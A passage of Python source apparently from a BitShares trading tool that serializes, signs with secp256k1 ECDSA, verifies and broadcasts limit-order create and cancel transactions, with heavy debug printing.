leading_zeroes_count = 0
for b in base58_text:
n = n * 58 + BASE58.find(b)
if n == 0:
leading_zeroes_count += 1
res = bytearray()
while n >= 256:
div, mod = divmod(n, 256)
res.insert(0, mod)
n = div
else:
res.insert(0, n)
return hexlify(bytearray(1) * leading_zeroes_count + res).decode('ascii')
def base58encode(hexstring):
print(green('base58encode'))
byteseq = bytes(unhexlify(bytes(hexstring, 'ascii')))
n = 0
leading_zeroes_count = 0
for c in byteseq:
n = n * 256 + c
if n == 0:
leading_zeroes_count += 1
res = bytearray()
while n >= 58:
div, mod = divmod(n, 58)
res.insert(0, BASE58[mod])
n = div
else:
res.insert(0, BASE58[n])
ret = (BASE58[0:1] * leading_zeroes_count + res).decode('ascii')
# public_key = 'BTS' + str(ret)
# print(purple(public_key), "public key")
print('len(ret)', len(ret))
return ret
def ripemd160(s):
# 160-bit cryptographic hash function
ripemd160 = hashlib_new('ripemd160') # import the library
ripemd160.update(unhexlify(s))
ret = ripemd160.digest()
print('use hashlib to perform a ripemd160 message digest')
print(ret)
return ret
def doublesha256(s):
# double sha256 cryptographic hash function
ret = sha256(sha256(unhexlify(s)).digest()).digest()
print('use hashlib to perform a double sha256 message digest')
print(ret)
return ret
def base58CheckEncode(version, payload):
print(green('base58CheckEncode'))
print(payload, version)
s = ('%.2x' % version) + payload
print(s)
checksum = doublesha256(s)[:4]
result = s + hexlify(checksum).decode('ascii')
return base58encode(result)
def gphBase58CheckEncode(s):
print(yellow('gphBase58CheckEncode'))
print(s)
checksum = ripemd160(s)[:4]
result = s + hexlify(checksum).decode('ascii')
return base58encode(result)
def base58CheckDecode(s):
print(green('base58CheckDecode'))
print(s)
s = unhexlify(base58decode(s))
dec = hexlify(s[:-4]).decode('ascii')
checksum = doublesha256(dec)[:4]
assert(s[-4:] == checksum)
return dec[2:]
def gphBase58CheckDecode(s):
print(yellow('gphBase58CheckDecode'))
print(s)
s = unhexlify(base58decode(s))
dec = hexlify(s[:-4]).decode('ascii')
checksum = ripemd160(dec)[:4]
assert(s[-4:] == checksum)
return dec
' ADDRESS AND KEYS '
class Address(object): # cropped litepresence2019
"""
Example :: Address("BTSFN9r6VYzBK8EKtMewfNbfiGCr56pHDBFi")
"""
# graphenebase/account.py
def __init__(self, address=None, pubkey=None, prefix="BTS"):
print(red('Address'), 'pubkey', pubkey)
self.prefix = prefix
self._pubkey = Base58(pubkey, prefix=prefix)
self._address = None
class PublicKey(Address): # graphenebase/account.py
"""
This class deals with Public Keys and inherits ``Address``.
:param str pk: Base58 encoded public key
:param str prefix: Network prefix (defaults to ``BTS``)
"""
def __init__(self, pk, prefix="BTS"):
global authenticated
print(red('PublicKey'))
self.prefix = prefix
self._pk = Base58(pk, prefix=prefix)
self.address = Address(pubkey=pk, prefix=prefix)
self.pubkey = self._pk
public_key = prefix + str(self._pk)
if login and (len(public_key) == 53):
try:
public_key = prefix + str(self._pk)
print(public_key)
print(len(public_key))
account = rpc_key_reference(public_key)
print(str(account[0][0]))
print(str(account_id))
if str(account[0][0]) == str(account_id):
authenticated = True
print ('authenticated:', authenticated)
except:
pass
def _derive_y_from_x(self, x, is_even):
print(purple(' y^2 = x^3 + ax + b '))
print(self, x)
""" Derive y point from x point """
curve = ecdsa_SECP256k1.curve
a, b, p = curve.a(), curve.b(), curve.p()
alpha = (pow(x, 3, p) + a * x + b) % p
beta = ecdsa_numbertheory.square_root_mod_prime(alpha, p)
if (beta % 2) == is_even:
beta = p - beta
print(beta)
return beta
def compressed(self):
print('PublicKey.compressed')
""" Derive compressed public key """
order = ecdsa_SECP256k1.generator.order()
p = ecdsa_VerifyingKey.from_string(
bytes(self),
curve=ecdsa_SECP256k1).pubkey.point
x_str = ecdsa_util.number_to_string(p.x(), order)
# y_str = ecdsa_util.number_to_string(p.y(), order)
compressed = hexlify(
bytes(chr(2 + (p.y() & 1)),
'ascii') + x_str).decode('ascii')
return(compressed)
def unCompressed(self):
print('PublicKey.unCompressed')
""" Derive uncompressed key """
public_key = repr(self._pk)
prefix = public_key[0:2]
if prefix == "04":
return public_key
assert prefix == "02" or prefix == "03"
x = int(public_key[2:], 16)
y = self._derive_y_from_x(x, (prefix == "02"))
key = '04' + '%064x' % x + '%064x' % y
return key
def __repr__(self):
# print('PublicKey.__repr__')
""" Gives the hex representation of the Graphene public key. """
return repr(self._pk)
def __format__(self, _format):
# print('PublicKey.__format__')
""" Formats the instance of:doc:`Base58 <base58>
` according to ``_format`` """
return format(self._pk, _format)
def __bytes__(self):
# print('PublicKey.__bytes__')
""" Returns the raw public key (has length 33)"""
return bytes(self._pk)
class PrivateKey(PublicKey): # merged litepresence2019
# Bitshares(MIT) graphenebase/account.py
# Bitshares(MIT) bitsharesbase/account.py
""" Derives the compressed and uncompressed public keys and
constructs two instances of ``PublicKey``:
"""
def __init__(self, wif=None, prefix="BTS"):
print(prefix)
print(red('PrivateKey'))
print(PublicKey)
if wif is None:
import os
self._wif = Base58(hexlify(os.urandom(32)).decode('ascii'))
elif isinstance(wif, Base58):
self._wif = wif
else:
self._wif = Base58(wif)
# compress pubkeys only
self._pubkeyhex, self._pubkeyuncompressedhex = self.compressedpubkey()
self.pubkey = PublicKey(self._pubkeyhex, prefix=prefix)
self.uncompressed = PublicKey(
self._pubkeyuncompressedhex,
prefix=prefix)
self.uncompressed.address = Address(
pubkey=self._pubkeyuncompressedhex,
prefix=prefix)
self.address = Address(pubkey=self._pubkeyhex, prefix=prefix)
def compressedpubkey(self):
print('PrivateKey.compressedpubkey')
""" Derive uncompressed public key """
secret = unhexlify(repr(self._wif))
order = ecdsa_SigningKey.from_string(
secret,
curve=ecdsa_SECP256k1).curve.generator.order()
p = ecdsa_SigningKey.from_string(
secret,
curve=ecdsa_SECP256k1).verifying_key.pubkey.point
x_str = ecdsa_util.number_to_string(p.x(), order)
y_str = ecdsa_util.number_to_string(p.y(), order)
compressed = hexlify(
chr(2 + (p.y() & 1)).encode('ascii') + x_str).decode('ascii')
uncompressed = hexlify(
chr(4).encode('ascii') + x_str + y_str).decode('ascii')
return([compressed, uncompressed])
def __bytes__(self):
# print('PrivateKey.__bytes__')
""" Returns the raw private key """
return bytes(self._wif)
' SERIALIZATION '
class GrapheneObject(object): # Bitshares(MIT) graphenebase/objects.py
def __init__(self, data=None):
self.data = data
def __bytes__(self):
# encodes data into wire format'
if self.data is None:
return bytes()
b = b""
for name, value in self.data.items():
if isinstance(value, str):
b += bytes(value, 'utf-8')
else:
b += bytes(value)
return b
class Asset(GrapheneObject): # bitsharesbase/objects.py
def __init__(self, *args, **kwargs):
if isArgsThisClass(self, args):
self.data = args[0].data
else:
if len(args) == 1 and len(kwargs) == 0:
kwargs = args[0]
super().__init__(OrderedDict([
('amount', Int64(kwargs["amount"])),
('asset_id', ObjectId(kwargs["asset_id"], "asset"))
]))
class Operation(): # refactored litepresence2019
'class GPHOperation():'
# Bitshares(MIT) graphenebase/objects.py
'class Operation(GPHOperation):'
# Bitshares(MIT) bitsharesbase/objects.py
def __init__(self, op):
if not (isinstance(op, list)):
raise ValueError('expecting op to be a list')
if not (len(op) == 2):
raise ValueError('expecting op to be two items')
if not (isinstance(op[0], int)):
raise ValueError('expecting op[0] to be integer')
self.opId = op[0]
name = OP_NAMES[self.opId]
self.name = name[0].upper() + name[1:]
if op[0] == 1:
self.op = Limit_order_create(op[1])
if op[0] == 2:
self.op = Limit_order_cancel(op[1])
def __bytes__(self):
print(yellow('GPHOperation.__bytes__'))
return bytes(Id(self.opId)) + bytes(self.op)
class Signed_Transaction(GrapheneObject): # merged litepresence2019
# Bitshares(MIT) graphenebase/signedtransactions.py
# Bitshares(MIT) bitsharesbase/signedtransactions.py
def __init__(self, *args, **kwargs):
print(red('Signed_Transaction'))
print(
""" Create a signed transaction and
offer method to create the signature
(see ``getBlockParams``)
:param num refNum: parameter ref_block_num
:param num refPrefix: parameter ref_block_prefix
:param str expiration: expiration date
:param Array operations: array of operations
"""
)
print('args, kwargs', args, kwargs)
if isArgsThisClass(self, args):
self.data = args[0].data
else:
if len(args) == 1 and len(kwargs) == 0:
kwargs = args[0]
if "extensions" not in kwargs:
kwargs["extensions"] = Array([])
elif not kwargs.get("extensions"):
kwargs["extensions"] = Array([])
if "signatures" not in kwargs:
kwargs["signatures"] = Array([])
else:
kwargs["signatures"] = Array(
[Signature(unhexlify(a)) for a in kwargs["signatures"]])
if "operations" in kwargs:
opklass = self.getOperationKlass()
if all([not isinstance(a, opklass)
for a in kwargs["operations"]]):
kwargs['operations'] = Array(
[opklass(a) for a in kwargs["operations"]])
else:
kwargs['operations'] = Array(kwargs["operations"])
super().__init__(OrderedDict([
('ref_block_num', Uint16(kwargs['ref_block_num'])),
('ref_block_prefix', Uint32(kwargs['ref_block_prefix'])),
('expiration', PointInTime(kwargs['expiration'])),
('operations', kwargs['operations']),
('extensions', kwargs['extensions']),
('signatures', kwargs['signatures']),
]))
@property
def id(self):
print('Signed_Transaction.id')
"""
The transaction id of this transaction
"""
# Store signatures temporarily
sigs = self.data["signatures"]
self.data.pop("signatures", None)
# Generage Hash of the seriliazed version
h = sha256(bytes(self)).digest()
# Recover signatures
self.data["signatures"] = sigs
# Return properly truncated tx hash
return hexlify(h[:20]).decode("ascii")
def getOperationKlass(self):
print('Signed_Transaction.get_operationKlass')
return Operation
def derSigToHexSig(self, s):
print('Signed_Transaction.derSigToHexSig')
s, junk = ecdsa_der.remove_sequence(unhexlify(s))
if junk:
log.debug('JUNK: %s', hexlify(junk).decode('ascii'))
assert(junk == b'')
x, s = ecdsa_der.remove_integer(s)
y, s = ecdsa_der.remove_integer(s)
return '%064x%064x' % (x, y)
def deriveDigest(self, chain):
print('Signed_Transaction.deriveDigest')
print(self, chain)
# Do not serialize signatures
sigs = self.data["signatures"]
self.data["signatures"] = []
# Get message to sign
# bytes(self) will give the wire formated data according to
# GrapheneObject and the data given in __init__()
self.message = unhexlify(ID) + bytes(self)
self.digest = sha256(self.message).digest()
# restore signatures
self.data["signatures"] = sigs
def verify(self, pubkeys=[], chain="BTS"):
print(green('###############################################'))
print('Signed_Transaction.verify')
print(green('self, pubkeys, chain'), self, pubkeys, chain)
self.deriveDigest(chain)
print(green('self'))
print(self)
signatures = self.data["signatures"].data
print(green('signatures'))
print(signatures)
pubKeysFound = []
for signature in signatures:
p = verify_message(
self.message,
bytes(signature)
)
phex = hexlify(p).decode('ascii')
print('')
print('')
print(green('phex'))
print(green(phex))
print(cyan('len(phex)'), len(str(phex)))
print('')
print('')
pubKeysFound.append(phex)
for pubkey in pubkeys:
print(green('for pubkey in pubkeys:'))
print(green('************ pubkey ************'))
print(blue('repr(pubkey)'))
print(repr(pubkey))
print(cyan('len(pubkey)'), len(str(pubkey)))
print('')
if not isinstance(pubkey, PublicKey):
raise Exception("Pubkeys must be array of 'PublicKey'")
k = pubkey.unCompressed()[2:]
print(green('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>'))
print(yellow('k'))
print(k)
print(cyan('len(k)'), len(str(k)))
print(yellow('pubKeysFound'))
print(pubKeysFound)
print(cyan('len(pubKeysFound[0])'), len(pubKeysFound[0]))
print('')
print(green('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>'))
if k not in pubKeysFound and repr(pubkey) not in pubKeysFound:
print(
blue('if k not in pubKeysFound and repr(pubkey) ' +
'not in pubKeysFound:'))
k = PublicKey(PublicKey(k).compressed())
f = format(k, 'BTS') # chain_params["prefix"]) # 'BTS'
print('')
print(red('FIXME'))
raise Exception("Signature for %s missing!" % f)
return pubKeysFound
def sign(self, wifkeys, chain="BTS"):
print('Signed_Transaction.sign')
"""
Sign the transaction with the provided private keys.
"""
self.deriveDigest(chain)
# Get Unique private keys
self.privkeys = []
[self.privkeys.append(item)
for item in wifkeys if item not in self.privkeys]
# Sign the message with every private key given!
sigs = []
for wif in self.privkeys:
signature = sign_message(self.message, wif)
sigs.append(Signature(signature))
self.data["signatures"] = Array(sigs)
return self
class Limit_order_create(GrapheneObject): # bitsharesbase/operations.py
def __init__(self, *args, **kwargs):
if isArgsThisClass(self, args):
self.data = args[0].data
else:
if len(args) == 1 and len(kwargs) == 0:
kwargs = args[0]
super().__init__(OrderedDict([
('fee', Asset(kwargs["fee"])),
('seller', ObjectId(kwargs["seller"], "account")),
('amount_to_sell', Asset(kwargs["amount_to_sell"])),
('min_to_receive', Asset(kwargs["min_to_receive"])),
('expiration', PointInTime(kwargs["expiration"])),
('fill_or_kill', Uint8(kwargs["fill_or_kill"])),
('extensions', Array([])),
]))
class Limit_order_cancel(GrapheneObject): # bitsharesbase/operations.py
def __init__(self, *args, **kwargs):
if isArgsThisClass(self, args):
self.data = args[0].data
else:
if len(args) == 1 and len(kwargs) == 0:
kwargs = args[0]
super().__init__(OrderedDict([
('fee', Asset(kwargs["fee"])),
('fee_paying_account', ObjectId(
kwargs["fee_paying_account"], "account")),
('order', ObjectId(kwargs["order"], "limit_order")),
('extensions', Array([])),
]))
def verify_message(message, signature, hashfn=sha256):
# graphenebase/ecdsa.py stripped of non-secp256k1 methods
print(red('verify_message...return phex'))
# require message and signature to be bytes
if not isinstance(message, bytes):
message = bytes(message, "utf-8")
if not isinstance(signature, bytes):
signature = bytes(signature, "utf-8")
digest = hashfn(message).digest()
sig = signature[1:]
# recover parameter only
recoverParameter = bytearray(signature)[0] - 4 - 27
# "bitwise or"; each bit of the output is 0
# if the corresponding bit of x AND of y is 0, otherwise it's 1
ALL_FLAGS = (secp256k1_lib.SECP256K1_CONTEXT_VERIFY |
secp256k1_lib.SECP256K1_CONTEXT_SIGN)
# ecdsa.PublicKey with additional functions to serialize
# in uncompressed and compressed formats
pub = secp256k1_PublicKey(flags=ALL_FLAGS)
# recover raw signature
sig = pub.ecdsa_recoverable_deserialize(sig, recoverParameter)
# recover public key
verifyPub = secp256k1_PublicKey(pub.ecdsa_recover(message, sig))
# convert recoverable sig to normal sig
normalSig = verifyPub.ecdsa_recoverable_convert(sig)
# verify
verifyPub.ecdsa_verify(message, normalSig)
phex = verifyPub.serialize(compressed=True)
return phex
def isArgsThisClass(self, args): # graphenebase/objects.py
# if there is only one argument and its type name is
# the same as the type name of self
ret = (len(args) == 1 and
type(args[0]).__name__ == type(self).__name__)
return ret
' PRIMARY TRANSACTION BACKBONE '
def build_transaction(order):
# this performs incoming limit order api conversion
# from human terms to graphene terms
# humans speak:
"account name, asset name, order number"
"decimal amounts, rounded is just fine"
"buy/sell/cancel"
"amount of assets"
"price in currency"
# graphene speaks:
"1.2.x, 1.3.x, 1.7.x"
"only in integers"
"create/cancel"
"min_to_receive/10^receiving_precision"
"amount_to_sell/10^selling_precision"
# build_transaction speaks:
"list of buy/sell/cancel human terms edicts any order in"
"validated data request"
"autoscale amounts if out of budget"
"autoscale amounts if spending last bitshare"
"bundled cancel/buy/sell transactions out; cancel first"
"prevent inadvertent huge number of orders"
"do not place orders for dust amounts"
global account_id, account_name, currency_id, asset_id
global currency_precision, asset_precision
' VALIDATE INCOMING DATA '
if not isinstance(order['edicts'], list):
raise ValueError('order parameter must be list: %s' % order['edicts'])
if not isinstance(order['nodes'], list):
raise ValueError('order parameter must be list: %s' % order['nodes'])
if not isinstance(order['header'], dict):
raise ValueError('order parameter must be list: %s' % order['header'])
# the location of the decimal place must be provided by order
currency_precision = int(order['header']['currency_precision'])
asset_precision = int(order['header']['asset_precision'])
# validate a.b.c identifiers of account id and asset ids
currency_id = str(order['header']['currency_id'])
asset_id = str(order['header']['asset_id'])
account_id = str(order['header']['account_id'])
account_name = str(order['header']['account_name'])
for i in [account_id, currency_id, asset_id]:
try:
a, b, c = i.split('.')
int(a) == 1
int(b) in [2, 3]
int(c) == float(c)
except:
raise ValueError('invalid object id %s' % i)
' GATHER TRANSACTION HEADER DATA '
# fetch block data via websocket request
block = rpc_block_number()
ref_block_num = block["head_block_number"] & 0xFFFF
ref_block_prefix = unpack_from(
"<I",
unhexlify(block["head_block_id"]),
4)[0]
# fetch limit order create and cancel fee via websocket request
fees = rpc_fees()
# establish transaction expiration
tx_expiration = to_iso_date(int(time() + 120))
# initialize tx_operations list
tx_operations = []
' SORT INCOMING EDICTS BY TYPE AND CONVERT TO DECIMAL '
buy_edicts = []
sell_edicts = []
cancel_edicts = []
if not login:
for edict in order['edicts']:
if edict['op'] == 'cancel':
print(yellow(str({k:str(v) for k,v in edict.items()})))
cancel_edicts.append(edict)
elif edict['op'] == 'buy':
print(yellow(str({k:str(v) for k,v in edict.items()})))
buy_edicts.append(edict)
elif edict['op'] == 'sell':
print(yellow(str({k:str(v) for k,v in edict.items()})))
sell_edicts.append(edict)
for i in range(len(buy_edicts)):
buy_edicts[i]['amount'] = decimal(buy_edicts[i]['amount'])
buy_edicts[i]['price'] = decimal(buy_edicts[i]['price'])
for i in range(len(sell_edicts)):
sell_edicts[i]['amount'] = decimal(sell_edicts[i]['amount'])
sell_edicts[i]['price'] = decimal(sell_edicts[i]['price'])
if DEV:
print('early edicts')
edicts = cancel_edicts + buy_edicts + sell_edicts
pprint(edicts)
' TRANSLATE CANCEL ORDERS TO GRAPHENE '
for edict in cancel_edicts:
if '1.7.X' in edict['ids']: # the "cancel all" signal
# for cancel all op, we collect all open orders in 1 market
edict['ids'] = rpc_open_orders()
print(yellow(str(edict)))
for order_id in edict['ids']:
# confirm it is good 1.7.x format:
order_id = str(order_id)
a, b, c = order_id.split('.', 2)
assert (int(a) == 1)
assert (int(b) == 7)
assert (int(c) == float(c) > 0)
# create cancel fee ordered dictionary
fee = OrderedDict([
('amount', fees['cancel']),
('asset_id', '1.3.0')
])
# create ordered operation dicitonary for this edict
operation = [2, # two means "Limit_order_cancel"
OrderedDict([
('fee', fee),
('fee_paying_account', account_id),
('order', order_id),
('extensions', [])
])]
# append the ordered dict to the tx operations list
tx_operations.append(operation)
if DEV:
print('after cancel edicts')
edicts = cancel_edicts + buy_edicts + sell_edicts
pprint(edicts)
' SCALE ORDER SIZE TO FUNDS ON HAND '
if (AUTOSCALE or BTS_FEES) and not login:
currency, assets, bitshares = rpc_balances()
if AUTOSCALE and len(buy_edicts + sell_edicts):
# autoscale buy edicts
if len(buy_edicts):
currency_value = 0
# calculate total value of each amount in the order
for i in range(len(buy_edicts)):
currency_value += (buy_edicts[i]['amount'] *
buy_edicts[i]['price'])
# scale the order amounts to means
scale = SIXSIG * currency / (currency_value + SATOSHI)
if scale < 1:
print(
yellow(
'ALERT: scaling buy edicts to means: %.3f' %
scale))
for i in range(len(buy_edicts)):
buy_edicts[i]['amount'] *= scale
# autoscale sell edicts
if len(sell_edicts):
asset_total = 0
# calculate total amount in the order
for i in range(len(sell_edicts)):
asset_total += (sell_edicts[i]['amount'])
scale = SIXSIG * assets / (asset_total + SATOSHI)
# scale the order amounts to means
if scale < 1:
print(
yellow(
'ALERT: scaling sell edicts to means: %.3f' %
scale))
for i in range(len(sell_edicts)):
sell_edicts[i]['amount'] *= scale
if DEV:
print('after autoscale edicts')
edicts = cancel_edicts + buy_edicts + sell_edicts
pprint(edicts)
' ALWAYS SAVE LAST 2 BITSHARES FOR FEES '
if BTS_FEES and (len(buy_edicts + sell_edicts)
and ('1.3.0' in [asset_id, currency_id])):
# print(bitshares, 'BTS balance')
# when BTS is the currency don't spend the last 2
if currency_id == '1.3.0' and len(buy_edicts):
bts_value = 0
# calculate total bts value of each amount in the order
for i in range(len(buy_edicts)):
bts_value += (buy_edicts[i]['amount'] *
buy_edicts[i]['price'])
# scale the order amounts to save last two bitshares
scale = SIXSIG * \
max(0, (bitshares - 2)) / (bts_value + SATOSHI)
if scale < 1:
print(
yellow(
'ALERT: scaling buy edicts for fees: %.4f' %
scale))
for i in range(len(buy_edicts)):
buy_edicts[i]['amount'] *= scale
# when BTS is the asset don't sell the last 2
if asset_id == '1.3.0' and len(sell_edicts):
bts_total = 0
# calculate total of each bts amount in the order
for i in range(len(sell_edicts)):
bts_total += sell_edicts[i]['amount']
scale = SIXSIG * \
max(0, (bitshares - 2)) / (bts_total + SATOSHI)
# scale the order amounts to save last two bitshares
if scale < 1:
print(
yellow(
'ALERT: scaling sell edicts for fees: %.4f' %
scale))
for i in range(len(sell_edicts)):
sell_edicts[i]['amount'] *= scale
if DEV:
print('after bts fee edicts')
edicts = cancel_edicts + buy_edicts + sell_edicts
pprint(edicts)
# after scaling recombine buy and sell
create_edicts = buy_edicts + sell_edicts
' REMOVE DUST EDICTS '
if DUST and len(create_edicts):
ce = []
dust = DUST * 100000 / 10 ** asset_precision
for i in range(len(create_edicts)):
if create_edicts[i]['amount'] > dust:
ce.append(create_edicts[i])
else:
print(
red('WARN: removing dust threshold %s order' %
dust), create_edicts[i])
create_edicts = ce[:] # copy as new list
del ce
if DEV:
print('after dust edicts')
edicts = cancel_edicts + buy_edicts + sell_edicts
pprint(edicts)
' TRANSLATE LIMIT ORDERS TO GRAPHENE '
for i in range(len(create_edicts)):
price = create_edicts[i]['price']
amount = create_edicts[i]['amount']
op_exp = int(create_edicts[i]['expiration'])
# convert zero expiration flag to "really far in future"
if op_exp == 0:
op_exp = END_OF_TIME
op_expiration = to_iso_date(op_exp)
# we'll use ordered dicts and put items in api specific order
min_to_receive = OrderedDict({})
amount_to_sell = OrderedDict({})
# derive min_to_receive & amount_to_sell from price & amount
# means SELLING currency RECEIVING assets
if create_edicts[i]['op'] == 'buy':
min_to_receive['amount'] = int(amount *
10 ** asset_precision)
min_to_receive['asset_id'] = asset_id
amount_to_sell['amount'] = int(amount * price *
10 ** currency_precision)
amount_to_sell['asset_id'] = currency_id
# means SELLING assets RECEIVING currency
if create_edicts[i]['op'] == 'sell':
min_to_receive['amount'] = int(amount * price *
10 ** currency_precision)
min_to_receive['asset_id'] = currency_id
amount_to_sell['amount'] = int(amount *
10 ** asset_precision)
amount_to_sell['asset_id'] = asset_id
# Limit_order_create fee ordered dictionary
fee = OrderedDict([
('amount', fees['create']),
('asset_id', '1.3.0')
])
# create ordered dicitonary from each buy/sell operation
operation = [1,
OrderedDict([
('fee', fee), # OrderedDict
('seller', account_id), # "a.b.c"
('amount_to_sell', amount_to_sell), # OrderedDict
('min_to_receive', min_to_receive), # OrderedDict
('expiration', op_expiration), # ISO8601
('fill_or_kill', KILL_OR_FILL), # bool
('extensions', []) # always empty list for our purpose
])]
tx_operations.append(operation)
if login:
# create an dummy cancel operation to pass to signing process
fee = OrderedDict([
('amount', 0),
('asset_id', '1.3.0')
])
operation = [2,
OrderedDict([
('fee', fee),
('fee_paying_account', account_id),
('order', '1.7.0'),
('extensions', [])
])]
tx_operations.append(operation)
# prevent inadvertent huge number of orders
tx_operations = tx_operations[:LIMIT]
# the tx is just a regular dictionary we will convert to json later
# the operations themselves must still be an OrderedDict
tx = {'ref_block_num': ref_block_num,
'ref_block_prefix': ref_block_prefix,
'expiration': tx_expiration,
'operations': tx_operations,
'signatures': [],
'extensions': []
}
return tx
def serialize_transaction(tx):
if tx['operations'] == []:
return tx, b""
# gist.github.com/xeroc/9bda11add796b603d83eb4b41d38532b
print(blue('serialize_transaction'))
print(yellow('IF WE DO EVERYTHING RIGHT:'))
print(green('rpc_tx_hex = manual_tx_hex'))
# RPC call for ordered dicts which are dumped by the query
print(yellow('get RPC tx hex...'))
rpc_tx_hex = rpc_get_transaction_hex_without_sig(tx)
print(yellow('build manual tx hex...'))
buf = b"" # create an empty byte string buffer
# add block number, prefix, and tx expiration to the buffer
buf += pack("<H", tx["ref_block_num"]) # 2 byte int
buf += pack("<I", tx["ref_block_prefix"]) # 4 byte int
buf += pack("<I", from_iso_date(tx['expiration'])) # 4 byte int
# add length of operations list to buffer
buf += bytes(varint(len(tx["operations"])))
# add the operations list to the buffer in graphene type fashion
for op in tx["operations"]:
# print(op[0]) # Int (1=create, 2=cancel)
# print(op[1]) # OrderedDict of operations
buf += varint(op[0])
if op[0] == 1:
buf += bytes(Limit_order_create(op[1]))
if op[0] == 2:
buf += bytes(Limit_order_cancel(op[1]))
# add legth of (empty) extensions list to buffer
buf += bytes(varint(len(tx["extensions"]))) # effectively varint(0)
# this the final manual transaction hex, which should match rpc
manual_tx_hex = hexlify(buf)
print(red('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'))
print(' rpc_tx_hex: ', rpc_tx_hex)
print('manual_tx_hex: ', manual_tx_hex)
print(red('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'))
print(yellow('assert (rpc_tx_hex == manual_tx_hex)'))
assert(rpc_tx_hex == manual_tx_hex), "Serialization Failed"
print(green('Serialization Success'))
# prepend the chain ID to the buffer to create final serialized msg
message = unhexlify(ID) + buf
return tx, message
def sign_transaction(tx, message):
# graphenebase/ecdsa.py
# tools.ietf.org/html/rfc6979
# @xeroc/steem-transaction-signing-in-a-nutshell
# @dantheman/steem-and-bitshares-cryptographic-security-update
# deterministic signatures retain the cryptographic
# security features associated with digital signatures
# but can be more easily implemented
# since they do not need high-quality randomness
# 1 in 4 signatures are randomly canonical; "normal form"
# using the other three causes vulnerability to maleability attacks
# as a metaphor; "require reduced fractions in simplest terms"
def canonical(sig):
sig = bytearray(sig)
# 0x80 hex = 10000000 binary = 128 integer
ret = (not (int(sig[0]) & 0x80) and
not (sig[0] == 0 and not (int(sig[1]) & 0x80)) and
not (int(sig[32]) & 0x80) and
not (sig[32] == 0 and not (int(sig[33]) & 0x80)))
print(green('canonical'), cyan(str(ret)))
print(sig)
return ret # true/false
# create fixed length representation of arbitrary length data
# this will thoroughly obfuscate and compress the transaction
# signing large data is computationally expensive and time consuming
# the hash of the data is a relatively small
# signing hash is more efficient than signing serialization
digest = sha256(message).digest()
print(digest)
'''
ECDSA
eliptical curve digital signature algorithm
this is where the real hocus pocus lies
all of the ordering, typing, serializing, and digesting
culminates with the message meeting the wif
'''
# 8 bit string representation of private key
p = bytes(PrivateKey(wif))
# create some arbitrary data used by the nonce generation
ndata = secp256k1_ffi.new("const int *ndata")
ndata[0] = 0 # it adds "\0x00", then "\0x00\0x00", etc..
while True: # repeat process until deterministic and cannonical
ndata[0] += 1 # increment the arbitrary nonce
# obtain compiled/binary private key from the wif
privkey = secp256k1_PrivateKey(p, raw=True)
print(red(str(privkey)))
print(privkey)
# create a new recoverable 65 byte ECDSA signature
sig = secp256k1_ffi.new(
'secp256k1_ecdsa_recoverable_signature *')
# parse a compact ECDSA signature (64 bytes + recovery id)
# returns: 1 = deterministic; 0 = not deterministic
deterministic = (
secp256k1_lib.secp256k1_ecdsa_sign_recoverable(
privkey.ctx, # initialized context object
sig, # array where signature is held
digest, # 32-byte message hash being signed
privkey.private_key, # 32-byte secret key
secp256k1_ffi.NULL, # default nonce function
ndata # incrementing nonce data
))
if not deterministic:
print('not deterministic, try again...')
continue
# we derive the recovery paramter
# which simplifies the verification of the signature
# it links the signature to a single unique public key
# without this parameter, the back-end would need to test
# for multiple public keys instead of just one
signature, i = privkey.ecdsa_recoverable_serialize(sig)
# we ensure that the signature is canonical; simplest form
if canonical(signature):
# add 4 and 27 to stay compatible with other protocols
i += 4 # compressed
i += 27 # compact
# and have now obtained our signature
break
# having derived a valid canonical signature
# we format it in its hexadecimal representation
# and add it our transactions signatures
# note that we do not only add the signature
# but also the recover parameter
# this kind of signature is then called "compact signature"
signature = hexlify(
pack("<B", i) + signature
).decode("ascii")
tx["signatures"].append(signature)
print(blue('tx["signatures"].append(signature)'))
print(signature)
print('')
return tx
def verify_transaction(tx):
# gist.github.com/xeroc/9bda11add796b603d83eb4b41d38532b
# once you have derived your new tx including the signatures
# verify your transaction and it's signature
print(blue('verify_transaction'))
print(blue('tx2 = Signed_Transaction(**tx)'))
tx2 = Signed_Transaction(**tx)
print(tx2)
print(blue('tx2.deriveDigest("BTS")'))
tx2.deriveDigest("BTS")
print(blue('pubkeys = [PrivateKey(wif).pubkey]'))
pubkeys = [PrivateKey(wif).pubkey]
print(pubkeys)
print(blue('tx2.verify(pubkeys, "BTS")'))
tx2.verify(pubkeys, "BTS")
return tx
' THE BROKER METHOD'
def broker(order):
'broker(order) --> execute(signal, order)'
# insistent timed multiprocess wrapper for authorized ops
# covers all incoming buy/sell/cancel authenticated requests
# if command does not execute in time: terminate and respawn
# serves to force disconnect websockets if hung
"up to ATTEMPTS chances; each PROCESS_TIMEOUT long: else abort"
# signal is switched to 0 after execution to end the process
global_constants()
global_variables()
control_panel()
log_in = False
if order['edicts'][0]['op'] == 'login':
log_in = True
signal = Value('i', 0)
auth = Value('i', 0)
i = 0
while (i < ATTEMPTS) and not signal.value:
i += 1
print('')
print('manualSIGNING authentication attempt:', i, ctime())
child = Process(target=execute, args=(signal, log_in, auth, order))
child.daemon = False
child.start()
if JOIN: # means main script will not continue till child done
child.join(PROCESS_TIMEOUT)
if log_in:
if auth.value == 1:
return True
else:
return False
def execute(signal, log_in, auth, order):
global nodes, account_id, account_name, wif, login, authenticated
login = log_in
start = time()
if not DEV: # disable printing with DEV=False
blockPrint()
nodes = order['nodes']
account_id = order['header']['account_id']
account_name = order['header']['account_name']
wif = order['header']['wif']
wss_handshake()
if not DEV:
enablePrint()
try:
tx = build_transaction(order)
except Exception as e:
trace(e)
if len(tx['operations']): # if there are any orders
if not DEV: # disable printing with DEV=False
blockPrint()
authenticated = False
# perform ecdsa on serialized transaction
try:
tx, message = serialize_transaction(tx)
except Exception as e:
trace(e)
try:
signed_tx = sign_transaction(tx, message)
except Exception as e:
trace(e)
if login:
# PublicKey.__init__ switches "authenticated"
if not DEV:
enablePrint()
print ('authenticated', authenticated)
if authenticated:
auth.value = 1
else:
signed_tx = verify_transaction(signed_tx)
if not DEV:
enablePrint()
broadcasted_tx = rpc_broadcast_transaction(signed_tx)
else:
print(red('manualSIGNING rejected your order'), order['edicts'])
print('manualSIGNING process elapsed: %.3f sec' %
(time() - start))
print('')
